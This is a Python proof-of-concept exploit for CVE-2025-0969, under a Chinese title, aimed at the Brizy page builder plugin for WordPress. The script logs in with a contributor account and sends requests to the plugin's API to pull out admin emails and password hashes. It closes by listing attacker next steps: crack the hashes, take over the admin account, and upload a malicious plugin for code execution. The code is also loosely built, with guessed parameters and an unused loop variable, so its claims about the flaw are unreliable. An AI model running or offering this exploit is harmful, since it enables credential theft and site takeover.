CVE-2025-0969 WordPress Brizy插件敏感信息泄露漏洞

# CVE-2025-0969 PoC - Brizy Plugin Sensitive Information Exposure # Author: Security Researcher # Target: WordPress with Brizy Plugin <= 2.7.16 import requests import json import sys from urllib.parse import urljoin def exploit_brizy_cve_2025_0969(target_url, username, password): """ Exploit for CVE-2025-0969: Brizy Page Builder Plugin Information Disclosure Requires Contributor+ level access to extract admin email and password hashes """ session = requests.Session() # Step 1: Login to WordPress with contributor account login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print(f'[*] Attempting login to {login_url}') response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in str(session.cookies) and 'authenticated' not in str(session.cookies): print('[-] Login failed. Check credentials.') return None print('[+] Login successful with contributor account') # Step 2: Exploit the vulnerable get_users() function via Brizy API # Target the vulnerable endpoint in editor/api.php exploit_url = urljoin(target_url, '/wp-content/plugins/brizy/editor/api.php') # Construct the vulnerable API request # The vulnerability is in get_users() function called via this endpoint params = { 'brizy_api': 'get_users', # Vulnerable function call 'hash': '', # May need valid hash depending on plugin config '_ajax_nonce': '' # May need nonce for some configurations } headers = { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/json' } print(f'[*] Exploiting vulnerable endpoint: {exploit_url}') try: # Try different attack vectors attack_vectors = [ {'action': 'brizy_get_users', 'method': 'GET'}, {'action': 'brizy_get_users', 'method': 'POST'}, {'endpoint': exploit_url, 'params': params, 'method': 'GET'} ] for vector in attack_vectors: if vector['method'] == 'GET': response = session.get(exploit_url, params=params, headers=headers) else: response = session.post(exploit_url, data=params, headers=headers) # Check for successful data exfiltration if response.status_code == 200: try: data = response.json() if 'users' in data or 'data' in data or 'email' in str(data).lower(): print('[+] Potential sensitive data found!') print(f'[+] Response: {json.dumps(data, indent=2)}') return data except: if 'user_email' in response.text or 'wp_users' in response.text: print('[+] Sensitive data found in response!') print(f'[+] Response preview: {response.text[:500]}') return response.text print('[-] No vulnerable response detected. Target may be patched or not vulnerable.') return None except requests.exceptions.RequestException as e: print(f'[-] Request failed: {e}') return None def main(): if len(sys.argv) < 4: print('Usage: python cve_2025_0969_poc.py <target_url> <username> <password>') print('Example: python cve_2025_0969_poc.py http://example.com contributor password123') sys.exit(1) target_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] print('=' * 60) print('CVE-2025-0969 - Brizy Page Builder Information Disclosure') print('=' * 60) result = exploit_brizy_cve_2025_0969(target_url, username, password) if result: print('\n[!] Exploitation successful!') print('[!] Extracted sensitive information includes:') print(' - Admin email addresses') print(' - Password hashes (can be cracked offline)') print('\n[!] Next steps for attacker:') print(' 1. Crack password hashes using tools like hashcat') print(' 2. Use cracked credentials to gain admin access') print(' 3. Upload malicious plugin for RCE') else: print('\n[-] Exploitation failed or target is not vulnerable') if __name__ == '__main__': main()